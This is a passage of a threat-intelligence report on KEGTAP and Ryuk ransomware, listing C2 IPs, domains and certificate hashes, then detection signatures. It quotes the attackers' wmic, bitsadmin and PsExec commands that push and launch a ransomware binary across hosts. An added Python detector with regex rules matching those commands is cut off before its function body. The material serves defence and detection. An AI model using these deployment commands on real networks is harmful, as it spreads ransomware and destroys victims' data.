| 3/19/20 | 134.122.124.26:443 | CN=serviceboostnumberone[.]com | 880982d4781a1917649ce0bb6b0d9522 |
| 3/20/20 | 45.141.86.97:443 | CN=ninethservice-developer[.]com | e4a720edfcc7467741c582cb039f20e0 |
| 3/20/20 | 178.62.247.205:443 | CN=top-serviceupdater[.]com | a45522bd0a26e07ed18787c739179ccb |
| 3/20/20 | 159.203.36.61:443 | CN=yourserviceupdater[.]com | 7b422c90dc85ce261c0a69ba70d8f6b5 |
| 3/20/20 | 134.122.20.117:443 | CN=fifthserviceupdater[.]com | 99aa16d7fc34cdcc7dfceab46e990f44 |
| 3/23/20 | 165.22.125.178:443 | CN=servicemonsterr[.]com | 82abfd5b55e14441997d47aee4201f6d |
| 3/24/20 | 69.55.60.140:443 | CN=boostyourservice[.]com | 7f3787bf42f11da321461e6db7f295d1 |
| 3/24/20 | 45.141.86.98:443 | CN=tenthservice-developer[.]com | eef29bcbcba1ce089a50aefbbb909203 |
| 3/26/20 | 178.79.132.82:443 | CN=developmasters[.]com | 5cf480eba910a625e5e52e879ac5aecb |
| 3/26/20 | 194.26.29.247:443 | CN=thirteenthservicehelper[.]com | 2486df3869c16c0d9c23a83cd61620c2 |
| 5/4/20 | 159.65.216.127:443 | CN=info-develop[.]com | 5f7a5fb72c6689934cc5d9c9a681506b |
| 9/22/20 | 69.61.38.155:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=gtrsqer[.]com | d37ba4a4b1885e96ff54d1f139bf3f47 |
| 9/22/20 | 96.9.225.144:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=hakunaman[.]com | 4408ba9d63917446b31a0330c613843d |
| 9/22/20 | 96.9.209.216:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=caonimas[.]com | d921dd1ba03aaf37d5011020577e8147 |
| 9/22/20 | 107.173.58.176:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=chalengges[.]com | dfeb6959b62aff0b93ca20fd40ef01a8 |
| 9/22/20 | 96.9.225.143:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=reginds[.]com | 05c03b62dea6ec06006e57fd0a6ba22e |
| 9/22/20 | 69.61.38.156:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=errvghu[.]com | c14a892f8203a04c7e3298edfc59363a |
| 9/22/20 | 45.34.6.229:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=harddagger[.]com | 7ed16732ec21fb3ec16dbb8df0aa2250 |
| 9/22/20 | 45.34.6.226:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=getinformationss[.]com | 1788068aff203fa9c51d85bf32048b9c |
| 9/22/20 | 45.34.6.225:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=gameleaderr[.]com | 0fff2f721ad23648175d081672e77df4 |
| 9/22/20 | 107.173.58.185:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=razorses[.]com | b960355ba112136f93798bf85e6392bf |
| 9/22/20 | 107.173.58.183:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=nomadfunclub[.]com | a3d4e6d1f361d9c335effdbd33d12e79 |
| 9/22/20 | 107.173.58.175:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=bouths[.]com | e13fbdff954f652f14faf11b735c0ef8 |
| 9/22/20 | 185.184.223.194:443 | C=US,ST=CA,L=Texas,O=lol,OU=,CN=regbed[.]com | 67310b30bada4f77f8f336438890d8f2 |
| 9/22/20 | 109.70.236.134:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=vnuret[.]com | ae74cbb9838688363b7928b06963c40a |
| 9/23/20 | 64.44.131.103:443 | C=US,ST=TX,L=Texas,O=serviceswork,OU=,CN=serviceswork[.]net | af518cc031807f43d646dc508685bcd3 |
| 9/23/20 | 69.61.38.157:443 | C=US,ST=TX,L=Texas,O=office,OU=,CN=moonshardd[.]com | c8fd81d6d3c8cbb8256c470a613a7c7b |
| 9/23/20 | 193.142.58.129:443 | C=US,ST=TX,L=Texas,O=zapored,OU=,CN=zapored[.]com | 5a22c3c8a0ed6482cad0e2b867c4c10c |
| 9/23/20 | 45.34.6.223:443 | C=US,ST=TX,L=Texas,O=office,OU=,CN=hurrypotter[.]com | bf598ba46f47919c264514f10ce80e34 |
| 9/23/20 | 107.173.58.179:443 | C=US,ST=TX,L=Texas,O=office,OU=,CN=biliyilish[.]com | 1c8243e2787421373efcf98fc0975031 |
| 9/23/20 | 45.34.6.222:443 | C=US,ST=TX,L=Texas,O=dagger,OU=,CN=daggerclip[.]com | 576d65a68900b270155c2015ac4788bb |
| 9/23/20 | 107.173.58.180:443 | C=US,ST=TX,L=Texas,O=office,OU=,CN=blackhoall[.]com | 69643e9b1528efc6ec9037b60498b94c |
| 9/23/20 | 107.173.58.182:443 | C=US,ST=TX,L=Texas,O=office,OU=,CN=checkhunterr[.]com | ca9b7e2fcfd35f19917184ad2f5e1ad3 |
| 9/23/20 | 45.34.6.221:443 | C=US,ST=TX,L=Texas,O=office,OU=,CN=check4list[.]com | e5e0f017b00af6f020a28b101a136bad |
| 9/24/20 | 213.252.244.62:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=ayiyas[.]com | 8367a1407ae999644f25f665320a3899 |
| 9/24/20 | 185.25.50.167:443 | C=US,ST=TX,L=Texas,O=office,OU=,CN=chainnss[.]com | 34a78f1233e53010d29f2a4fa944c877 |
| 9/30/20 | 88.119.171.75:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=martahzz[.]com | eaebbe5a3e3ea1d5992a4dfd4af7a749 |
| 10/1/20 | 88.119.171.74:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=jonsonsbabyy[.]com | adc8cd1285b7ae62045479ed39aa37f5 |
| 10/1/20 | 88.119.171.55:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=tiancaii[.]com | bfe1fd16cd4169076f3fbaab5afcbe12 |
| 10/1/20 | 88.119.171.67:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=cantliee[.]com | c8a623eb355d172fc3e083763934a7f7 |
| 10/1/20 | 88.119.171.76:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=realgamess[.]com | 0ac5659596008e64d4d0d90dfb6abe7c |
| 10/1/20 | 88.119.171.68:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=maybebaybe[.]com | 48003b6b638dc7e79e75a581c58f2d77 |
| 10/1/20 | 88.119.171.69:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=saynoforbubble[.]com | 5c75a6bbb7454a04b9ea26aa80dfbcba |
| 10/1/20 | 88.119.171.73:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=chekingking[.]com | e391c997b757424d8b2399cba4733a60 |
| 10/1/20 | 88.119.171.77:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=wondergodst[.]com | 035697cac0ee92bb4d743470206bfe9a |
| 10/1/20 | 88.119.171.78:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=zetrexx[.]com | fc133bed713608f78f9f112ed7498f32 |
| 10/1/20 | 213.252.244.38:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=mountasd[.]com | 8ead6021e2a5b9191577c115d4e68911 |
| 10/1/20 | 107.173.58.184:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=pudgeee[.]com | 1c9949d20441df2df09d13778b751b65 |
| 10/1/20 | 88.119.174.109:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=loockfinderrs[.]com | c0ddfc954aa007885b467f8c4f70ad75 |
| 10/1/20 | 88.119.174.110:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=puckhunterrr[.]com | ee63098506cb82fc71a4e85043d4763f |
| 10/1/20 | 88.119.174.114:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=voiddas[.]com | 422b020be24b346da826172e4a2cf1c1 |
| 10/1/20 | 88.119.174.116:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=sibalsakie[.]com | 8d8f046e963bcd008fe4bbed01bed4c8 |
| 10/1/20 | 88.119.174.117:443 | C=US,ST=TX,L=TExas,O=lol,OU=,CN=rapirasa[.]com | c381fb63e9cb6b0fc59dfaf6e8c40af3 |
| 10/1/20 | 88.119.174.118:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=raidbossa[.]com | add6b742d0f992d56bede79888eef413 |
| 10/1/20 | 88.119.174.119:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=lindasak[.]com | 9bbd073033e34bfd80f658f0264f6fae |
| 10/1/20 | 88.119.174.121:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=bithunterr[.]com | 9afef617897e7089f59c19096b8436c8 |
| 10/1/20 | 88.119.174.120:443 | C=US,ST=TX,L=Texas,O=office,OU=,CN=giveasees[.]com | 3f366e5f804515ff982c151a84f6a562 |
| 10/1/20 | 88.119.174.107:443 | C=US,ST=TX,L=Texas,O=office,OU=,CN=shabihere[.]com | c2f99054e0b42363be915237cb4c950b |
| 10/1/20 | 88.119.174.125:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=tarhungangster[.]com | 4ac8ac12f1763277e35da08d8b9ea394 |
| 10/1/20 | 88.119.174.126:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=imagodd[.]com | 7080547306dceb90d809cb9866ed033c |
| 10/1/20 | 88.119.174.127:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=raaidboss[.]com | 03037dff61500d52a37efd4b4f520518 |
| 10/1/20 | 88.119.174.128:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=sunofgodd[.]com | 959bed7a2662d7274b303f3b120fddea |
| 10/1/20 | 213.252.244.126:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=hungrrybaby[.]com | 1d28556cc80df9627c20316358b625d6 |
| 10/1/20 | 213.252.244.170:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=loxliver[.]com | 85e65803443046f921b9a0a9b8cc277c |
| 10/1/20 | 213.252.246.154:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicegungster[.]com | 9df6ba82461aa0594ead03993c0e4c42 |
| 10/5/20 | 5.2.64.113:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=qascker[.]com | 18aadee1b82482c3cd5ebe32f3628f3f |
| 10/7/20 | 5.2.79.122:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=cheapshhot[.]com | 94bc44bd438d2e290516d111782badde |
| 10/7/20 | 88.119.171.94:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=havemosts[.]com | f0ede92cb0899a9810a67d716cdbebe2 |
| 10/7/20 | 5.2.64.133:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=mixunderax[.]com | e0f9efedd11d22a5a08ffb9c4c2cbb5a |
| 10/7/20 | 5.2.64.135:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=bugsbunnyy[.]com | 4aa2acabeb3ff38e39ed1d840124f108 |
| 10/7/20 | 5.2.72.202:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=sweetmonsterr[.]com | c04034b78012cca7dcc4a0fb5d7bb551 |
| 10/7/20 | 88.119.175.153:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=zhameharden[.]com | 2670bf08c43d995c74b4b83383af6a69 |
| 10/7/20 | 213.252.245.71:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceboosterr[.]com | 127cc347b711610c3bcee434eb8bf822 |
| 10/7/20 | 213.252.246.144:443 | C=US,ST=TX,L=Texas,O=US,OU=,CN=servicewikii[.]com | b3e7ab478ffb0213017d57a88e7b2e3b |
| 10/7/20 | 5.2.64.149:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=sobcase[.]com | 188f603570e7fa81b92906af7af177dc |
| 10/7/20 | 5.2.64.144:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=unlockwsa[.]com | 22d7f35e624b7bcee7bb78ee85a7945c |
| 10/7/20 | 88.119.174.139:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=serviceupdatter[.]com | 12c6e173fa3cc11cc6b09b01c5f71b0c |
| 10/7/20 | 88.119.174.133:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-boosterr[.]com | 28435684c76eb5f1c4b48b6bbc4b22af |
| 10/7/20 | 88.119.175.214:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=dotmaingame[.]com | 9c2d64cf4e8e58ef86d16e9f77873327 |
| 10/7/20 | 5.2.72.200:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=wodemayaa[.]com | f6f484baf1331abf55d06720de827190 |
| 10/7/20 | 5.2.79.10:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=hybriqdjs[.]com | d8eacda158594331aec3ad5e42656e35 |
| 10/7/20 | 5.2.79.12:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=gunsdrag[.]com | 29032dd12ea17fc37ffff1ee94cc5ba8 |
| 10/7/20 | 5.2.79.121:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=gungameon[.]com | eaf32b1c2e31e4e7b6d5c3e6ed6bff3d |
| 10/7/20 | 5.2.64.174:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=quwasd[.]com | 442680006c191692fcc3df64ec60d8fa |
| 10/7/20 | 5.2.64.172:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=remotessa[.]com | 0593cbf6b3a3736a17cd64170e02a78d |
| 10/7/20 | 5.2.64.167:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=secondlivve[.]com | 38df81824bd8cded4a8fa7ad9e4d1f67 |
| 10/7/20 | 5.2.64.182:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=luckyhunterrs[.]com | 99dbe71ca7b9d4a1d9f722c733b3f405 |
| 10/7/20 | 88.119.171.97:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicesupdater[.]com | 7d7199ffa40c50b6e5b025b8cb2661b2 |
| 10/7/20 | 88.119.171.96:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicemount[.]com | f433d25a0dad0def0510cd9f95886fdb |
| 10/7/20 | 96.9.209.217:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=fastbloodhunter[.]com | e84c7aa593233250efac903c19f3f589 |
| 10/7/20 | 69.61.38.132:443 | C=US,ST=CA,L=Mountainvew,O=Office,OU=,CN=kungfupandasa[.]com | e6e80f6eb5cbfc73cde40819007dcc53 |
| 10/13/20 | 45.147.230.131:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-monster[.]com | 4fdeab3dad077589d52684d35a9ea4ab |
| 10/13/20 | 45.147.229.92:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=bakcup-checker[.]com | b70cdb49b26e6e9ba7d0c42d5f3ed3cb |
| 10/13/20 | 45.147.229.68:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-simple[.]com | 57024c1fe5c4acaf30434ba1f58f9144 |
| 10/13/20 | 45.147.229.52:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup-leader[.]com | ec5496048f1962494d239d377e53db0c |
| 10/13/20 | 45.147.229.44:443 | C=US,ST=TX,L=Texsa,O=lol,OU=,CN=backup-helper[.]com | 938593ac1c8bdb2c5256540d7c8476c8 |
| 10/14/20 | 45.147.230.87:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=nasmastrservice[.]com | cced46e0a9b6c382a97607beb95f68ab |
| 10/14/20 | 45.147.230.159:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com | e912980fc8e9ec1e570e209ebb163f65 |
| 10/14/20 | 45.147.230.141:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com | 39d7160ce331a157d3ecb2a9f8a66f12 |
| 10/14/20 | 45.147.230.140:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com | d9ca73fe10d52eef6952325d102f0138 |
| 10/14/20 | 45.147.230.133:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com | 920d04330a165882c8076c07b00e1d93 |
| 10/14/20 | 45.147.230.132:443 | C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com |

        771463611a43ee35a0ce0631ef244dee

        10/14/20

        45.147.229.180:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=elephantdrrive[.]com

        1e4a794da7d3c6d0677f7169fbe3b526

        10/14/20

        45.147.230.159:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-leader[.]com

        9c7fe10135f6ad96ded28fac51b79dfd

        10/15/20

        45.147.230.132:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-servicess[.]com

        a78c0e2920e421667ae734d923dd5ca6

        10/15/20

        45.138.172.95:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hellper[.]com

        a0b2378ceae498f46401aadeb278fb31

        10/16/20

        108.62.12.119:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backuphelper[.]com

        e95bb7804e3add830496bd36664ed339

        10/16/20

        108.62.12.105:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-nas[.]com

        8d5dc95b3bd4d16a3434b991a09bf77e

        10/16/20

        108.62.12.114:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top-backupservice[.]com

        d5de2f5d2ca29da1724735cdb8fbc63f

        10/16/20

        108.62.12.116:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=bestservicehelper[.]com

        9c7396ecd107ee8f8bf5521afabb0084

        10/16/20

        45.147.230.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-checker[.]com

        1134a6f276f4297a083fc2a605e24f70

        10/16/20

        45.147.230.140:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-simple-helper[.]com

        2150045f476508f89d9a322561b28ff9

        10/16/20

        45.147.230.133:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=nas-leader[.]com

        f4ddc4562e5001ac8fdf0b7de079b344

        10/19/20

        74.118.138.137:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3-services[.]com

        75fb6789ec03961c869b52336fa4e085

        10/19/20

        74.118.138.115:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=simple-backupbooster[.]com

        9f5e845091015b533b59fe5e8536a435

        10/19/20

        108.177.235.53:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=best-backup[.]com

        4b78eaa4f2748df27ebf6655ea8a7fe9

        10/19/20

        74.118.138.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackup-helper[.]com

        bcccda483753c82e62482c55bc743c16

        10/21/20

        45.153.241.1:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1helper[.]com

        672c66dd4bb62047bb836bd89d2e1a65

        10/21/20

        45.153.240.240:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=checktodrivers[.]com

        6825409698a326cc319ca40cd85a602e

        10/21/20

        45.153.240.194:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1master[.]com

        7f9be0302da88e0d322e5701d52d4128

        10/21/20

        45.153.240.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=boost-yourservice[.]com

        2c6a0856d1a75b303337ac0807429e88

        10/21/20

        45.153.240.136:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1master[.]com

        6559dbf8c47383b7b493500d7ed76f6a

        10/23/20

        45.153.240.157:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1updater[.]com

        7bd044e0a6689ef29ce23e3ccb0736a3

        10/23/20

        45.153.240.178:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1updater[.]com

        9859a8336d097bc30e6e5c7a8279f18e

        10/23/20

        45.153.240.220:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverdwl[.]com

        43fb2c153b59bf46cf6f67e0ddd6ef51

        10/23/20

        45.153.240.222:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=viewdrivers[.]com

        22bafb30cc3adaa84fef747d589ab235

        10/23/20

        45.153.241.134:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backups1helper[.]com

        31e87ba0c90bb38b986af297e4905e00

        10/23/20

        45.153.241.138:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver1downloads[.]com

        f8a14846b7da416b14303bced5a6418f

        10/23/20

        45.153.241.146:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicehel[.]com

        01abdaf870d859f9c1fd76f0b0328a2b

        10/23/20

        45.153.241.153:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service-hel[.]com

        c2eaf144e21f3aef5fe4b1502d318ba6

        10/23/20

        45.153.241.158:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=servicereader[.]com

        de54af391602f3deea19cd5e1e912316

        10/23/20

        45.153.241.167:443

        C=US,ST=TX,L=Texas,O=US,OU=,CN=view-backup[.]com

        5f6fa19ffe5735ff81b0e7981a864dc8

        10/23/20

        45.147.231.222:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=top3servicebooster[.]com

        ff54a7e6f51a850ef1d744d06d8e6caa

        10/23/20

        45.153.241.141:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1view[.]com

        4cda9d0bece4f6156a80967298455bd5

        10/26/20

        74.118.138.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topbackupintheworld[.]com

        e317485d700bf5e8cb8eea1ec6a72a1a

        10/26/20

        108.62.12.12:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservice-masters[.]com

        e0022cbf0dd5aa597fee73e79d2b5023

        10/26/20

        108.62.12.121:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=topservicebooster[.]com

        44e7347a522b22cdf5de658a4237ce58

        10/26/20

        172.241.27.65:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backup1services[.]com

        cd3e51ee538610879d6fa77fa281bc6f

        10/26/20

        172.241.27.68:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmaster-service[.]com

        04b6aec529b3656040a68e17afdabfa4

        10/26/20

        172.241.27.70:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=backupmasterservice[.]com

        200c25c2b93203392e1acf5d975d6544

        10/26/20

        45.153.241.139:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driver-boosters[.]com

        9d7c52c79f3825baf97d1318bae3ebe2

        10/27/20

        45.153.241.14:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1update[.]com

        5bae28b0d0e969af2c0eda21abe91f35

        10/28/20

        190.211.254.154:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=driverjumper[.]com

        a1e62e7e547532831d0dd07832f61f54

        10/28/20

        81.17.28.70:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=service1boost[.]com

        67c7c75d396988ba7d6cd36f35def3e4

        10/28/20

        81.17.28.105:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivehepler[.]com

        880e59b44e7175e62d75128accedb221

        10/28/20

        179.43.160.205:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedownload[.]com

        cdea09a43bef7f1679e9cd1bbeb4b657

        10/28/20

        179.43.158.171:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivefinder[.]com

        512c6e39bf03a4240f5a2d32ee710ce5

        10/28/20

        179.43.133.44:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivedwn[.]com

        87f3698c743f8a1296babf9fbebafa9f

        10/28/20

        179.43.128.5:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idrivecheck[.]com

        6df66077378c5943453b36bd3a1ed105

        10/28/20

        179.43.128.3:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveupdate[.]com

        9706fd787a32a7e94915f91124de3ad3

        10/28/20

        81.17.28.122:443

        C=US,ST=TX,L=Texas,O=lol,OU=,CN=idriveview[.]com

        0e1b0266de2b5eaf427f5915086b4d7c

        RYUK Commands

        start wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"

        start PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"

        start PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe

        Detecting the Techniques

        FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

        Platform

        Signature Name

        Endpoint Security

        • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
        • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
        • SINGLEMALT (DOWNLOADER)
        • STILLBOT (BACKDOOR)
        • WINEKEY (DOWNLOADER)
        • CORKBOT (BACKDOOR)
        • RYUK RANSOMWARE ENCRYPT COMMAND (FAMILY)
        • RYUK RANSOMWARE SETUP EXECUTION (FAMILY)
        • RYUK RANSOMWARE WAKE-ON-LAN EXECUTION (FAMILY)
        • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER TARGET (UTILITY)
        • RYUK RANSOMWARE ENCRYPTOR DISTRIBUTION SCRIPT CREATION (UTILITY)
        • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER SOURCE (UTILITY)

        Network Security and Email Security

        • Downloader.Win.KEGTAP
        • Trojan.KEGTAP
        • APTFIN.Backdoor.Win.BEERBOT
        • APTFIN.Downloader.Win.SINGLEMALT
        • APTFIN.Backdoor.Win.STILLBOT
        • APTFIN.Downloader.Win.WINEKEY
        • APTFIN.Backdoor.Win.CORKBOT
        • FE_Downloader_Win64_KEGTAP
        • FE_APTFIN_Backdoor_Win32_BEERBOT
        • FE_APTFIN_Backdoor_Win_BEERBOT
        • FE_APTFIN_Downloader_Win32_SINGLEMALT
        • FE_APTFIN_Downloader_Win64_SINGLEMALT
        • FE_APTFIN_Backdoor_Win_STILLBOT
        • FE_APTFIN_Downloader_Win_WINEKEY
        • FE_APTFIN_Backdoor_Win_CORKBOT
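As an added example (not FireEye's code or signatures), the following Python detector flags the host-list fan-out and staging patterns visible in the RYUK command block above when run over constructed process-creation records; the host names, user names, benign commands and record layout are assumptions.

```python
"""Flag the lateral-movement and staging patterns shown in the RYUK command block.

Hypothetical detector written for this write-up; it is not FireEye's signature
logic. Each input record is a constructed process-creation event reduced to a
dict (think Sysmon Event ID 1 or Windows 4688): host, user, command line.
"""
import re

# Constructed sample events. The first three mirror the RYUK command block above
# (the leading "start" dropped, since the child process's own command line is
# what the event records); the rest are ordinary admin activity that must not fire.
SAMPLE_EVENTS = [
    {"host": "WS-PIVOT01", "user": "CORP\\svc_backup",
     "cmdline": r'wmic /node:@C:\share$\comps1.txt /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c bitsadmin /transfer vVv \\[REDACTED]\share$\vVv.exe %APPDATA%\vVv.exe & %APPDATA%\vVv.exe"'},
    {"host": "WS-PIVOT01", "user": "CORP\\svc_backup",
     "cmdline": r'PsExec.exe /accepteula @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c COPY "\\[REDACTED]\share$\vVv.exe" "C:\windows\temp\vVv.exe"'},
    {"host": "WS-PIVOT01", "user": "CORP\\svc_backup",
     "cmdline": r'PsExec.exe -d @C:\share$\comps1.txt -u [REDACTED] -p [REDACTED] cmd /c c:\windows\temp\vVv.exe'},
    {"host": "HELPDESK03", "user": "CORP\\alice",
     "cmdline": r'wmic os get Caption,Version'},
    {"host": "HELPDESK03", "user": "CORP\\alice",
     "cmdline": r'wmic /node:SRV01 process call create "notepad.exe"'},
    {"host": "HELPDESK03", "user": "CORP\\alice",
     "cmdline": r'bitsadmin /transfer agentjob https://updates.example.invalid/agent.msi C:\Users\alice\Downloads\agent.msi'},
    {"host": "HELPDESK03", "user": "CORP\\alice",
     "cmdline": r'PsExec.exe \\SRV01 -s cmd /c ipconfig /all'},
]

# Each rule: (rule_id, description, regex over the command line). The regexes key
# on the combination seen above: a host-list file (@...txt) driving wmic/PsExec
# fan-out, and an executable pulled from an admin share into a staging path.
RULES = [
    ("wmic_hostlist_exec",
     "wmic remote process creation driven by a host list file",
     re.compile(r"wmic(?:\.exe)?\s.*?/node:@\S+.*?process\s+call\s+create", re.I)),
    ("psexec_hostlist_exec",
     "PsExec run against a host list file with explicit credentials",
     re.compile(r"psexec(?:\.exe)?\s.*?@\S+\.txt.*?\s-u\s", re.I)),
    ("bitsadmin_to_staging",
     "bitsadmin transfer from an admin share into a user or temp staging path",
     re.compile(r"bitsadmin\s+/transfer\s+\S+\s+\\\\\S+\\\S+\$\\\S+\s+(?:%APPDATA%|%TEMP%|C:\\Windows\\Temp)", re.I)),
    ("copy_from_admin_share_to_temp",
     "cmd /c COPY of an executable from an admin share into C:\\Windows\\Temp",
     re.compile(r'cmd(?:\.exe)?\s+/c\s+copy\s+"?\\\\\S+\\\S+\$\\\S+\.exe"?\s+"?c:\\windows\\temp\\\S+', re.I)),
    ("exec_from_temp",
     "cmd /c execution of a binary staged in C:\\Windows\\Temp",
     re.compile(r"cmd(?:\.exe)?\s+/c\s+c:\\windows\\temp\\\S+\.exe", re.I)),
]


def scan_events(events):
    """Return one finding per (event, rule) pair whose regex matches the command line."""
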